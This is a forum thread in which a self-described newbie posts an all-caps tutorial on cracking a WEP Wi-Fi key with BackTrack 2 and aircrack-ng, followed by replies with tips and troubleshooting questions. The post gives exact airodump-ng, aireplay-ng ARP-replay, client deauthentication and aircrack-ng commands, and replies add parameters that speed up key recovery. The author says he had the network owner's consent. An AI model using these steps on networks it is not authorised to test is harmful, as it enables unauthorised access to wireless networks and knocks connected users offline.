How To Crack Wep With Bt2 Final
OK. IM A TOTAL NEWBIE TO LINUX AND SECURITY TESTING. I HAVE SEARCHED THIS FORUM AND HAVE YET TO FIND SIMPLE INSTRUCTIONS ON HOW TO CRACK WEP. SO, THIS IS FOR THE NEWBIES OUT THERE THAT ARE JUST LIKE ME. I USED BT 2 FINAL AND DID THIS CRACK ON A FRIENDS AP, WITH HIS CONSENT. I HAD NO PRIOR KNOWLEDGE ABOUT HIS AP OR WHETHER HIS WEP WAS 64 OR 128 BIT. HERE GOES:
OPEN UP KISMET AND FIND THE AP YOU WISH TO CRACK. HIT "S" AND THEN "C". THIS WILL SORT THE APs BY CHANNEL. USE THE ARROW KEY TO HIGHLIGHT THE AP YOU WISH TO CRACK. HIT ENTER. WRITE DOWN THE SSID, THE BSSID, AND THE CHANNEL. ALSO MAKE SURE IT HAS CLIENTS CONNECTED TO IT OTHERWISE ITS GOING TO BE NEXT TO IMPOSSIBLE TO OBTAIN ENOUGH IVS TO DO THE CRACK.
GO TO THE COMMAND SCREEN (CLICK THE SECOND ICON FROM THE LEFT ON THE BOTTOM LEFT SIDE OF THE SCREEN)
TYPE AIRODUMP-NG -W CAPTURE -C CHANNELNUMBER DEVICE
THE DEVICE WILL BE THE NAME OF YOUR WIRELESS CARD. YOU SHOULD SEE THE NAME ON THE COMMAND SCREEN THAT CAME UP WHEN YOU OPENED KISMET. MINE IS RA0. THE CHANNELNUMBER IS THE NUMBER OF THE CHANNEL THE AP IS ON. HIT ENTER.
ON THE SCREEN NOW YOU SHOULD SEE THE MAC ADDRESS OF THE AP YOU ARE CRACKING. SEVERAL LINES BELOW IT YOU SHOULD SEE AT LEAST 2 MAC ADDRESSES. ONE WILL BE THE AP AND THE OTHER WILL BE THE CLIENT. WRITE DOWN THE CLIENT MAC ADDRESS.
GO TO THE COMMAND SCREEN AGAIN AND TYPE AIREPLAY-NG --ARPREPLAY -B MACADDRESSOFAP -H MACADDRESSOFCLIENT DEVICE. HIT ENTER.
GO TO THE COMMAND SCREEN AGAIN AND TYPE AIREPLAY-NG -E SSIDOFNETWORK -A MACADDRESSOFAP -C MACADDRESSOFCLIENT --DEAUTH 10 DEVICE. HIT ENTER.
IF YOU LOOK ON THE AIRODUMP SCREEN YOU SHOULD SEE THE DATA NUMBERS RISING AT A FAST RATE. MAKE SURE THAT ON THE AIRPLAY SCREEN (THE COMMAND YOU EXCUTED BEFORE THE DEAUTH) AND MAKE SURE THAT AN ARP REQUEST WAS CAPTURED AND IS NOW BEING RESENT. IF IT IS THEN YOU SHOULD HAVE THE KEY IN NO TIME. LET IT RUN FOR ABOUT 5-10 MINS. YOU CAN CLOSE THE DEAUTH SCREEN.
GO TO THE COMMAND SCREEN AND TYPE: AIRCRACK-NG -F 4 MACADDRESSOFAP -N 64 CAPTURE-01.CAP
HIT ENTER. 64 IS FOR 64 BIT AND 128 AND FOR 128 BIT. IF YOU RUN THE CRACK ON 64 AND IT DOES NOT WORK AFTER A FEW TIMES THEN TRY THE 128. THE ONE I CRACKED ENDED UP BEING 128 AND TOOK ABOUT 35 MINS TO CRACK WITH ABOUT 1.2 MILLION IVS. ONE IMPORTANT NOTE ABOUT THE CAPTURE-01.CAP FILE: ON MINE, EVEN THOUGH I NAMED IT CAPTURE, IT NAMED IT CAPTURE-01. BE SURE TO CHECK UNDER EDITOR/KWRITE TO MAKE SURE OF THE EXACT NAME OF THE FILE. IT SHOULD BE THE ONLY CAP FILE IN THERE. JUST GO TO KWRITE AND GO TO OPEN. YOU SHOULD SEE YOUR FILE IN THERE. THIS HELD ME UP FOR QUITE SOME TIME TIL I SCREWED AROUND WITH IT.
ALSO THE -F CAN BE RAISED OR LOWERED. A HIGHER NUMBER WILL TAKE LONGER AND A LOWER NUMBER WILL BE FASTER, BUT MAY NOT FIND THE KEY. I STICK WITH 4.
HOPE THIS HELPS YOU NEWBIES.
My life is this forum
Wow that's a lot of YELLING.
Agreed, bunch of yellow and i hate reading shit in caps. Anyways props for the tut but there are at least 4 of them out there.
Why go thru all that typing of commands? With airoscript you just press 1, 2, 3, or 4 to run those commands.
sorry bout the caps guys...yeah, i have seen the other tuts on WEP cracking but most use older versions of BT and were not applicable to complete newbies...not to familar with using airoscrpit, I just prefer to type the commands out, although I will make an attempt to learn to use airoscript.
My life is this forum
Sorry for burning you on the caps....please know that the contribution back to the community is appreciated even if we bust yer chops for YELLING
How long should I leave aircrack working and how do I know the encryption type is 64 or 128??
How would i identify that aircrack is not working with a particular encryption type like example 64?
By the way GREAT TUT! just wish there was a video where we could watch how to crack WEP using BACK TRACK 2 FINAL.
How long you leave aircrack running depends on how many ivs you have. I have only cracked a 128 bit key and it took about 30-45 mins with 1.2million ivs. I believe the number for 64 bit is around 250,000-500,000. When I tried with 64 bit it ran for about 10 mins and then told me it couldnt find the key so I changed the f factor from 4 to 10 and it took a bit longer but still told me it couldnt find it. I then ran aircrack for 128 bit and it ran for quite some time before it found the key. I left aireplay running while aircrack was running also, that way it kept the ivs rising.
Originally Posted by Itssid
One more thing you should try is using -i 1, chances are its the first Hex Key it will save you a lot of time if it is. In a few cases I have cracked 64bit keys with 100,000 ivs is less then a minute.
ok whenever i try to do a arreplay attack it say the specified mac did not match the other mac or something like that and it says 0 for sent and 0 ARP requests, any ideas? OH and BTW the PWR under airodump always shows -1, even though i own RKJ and its just upstairs in my house. My wireless card is inbuilt in an IBM thinkpad intel centrino mobile technology. Heres a picture:
Removed by me
PLEASE help me out !!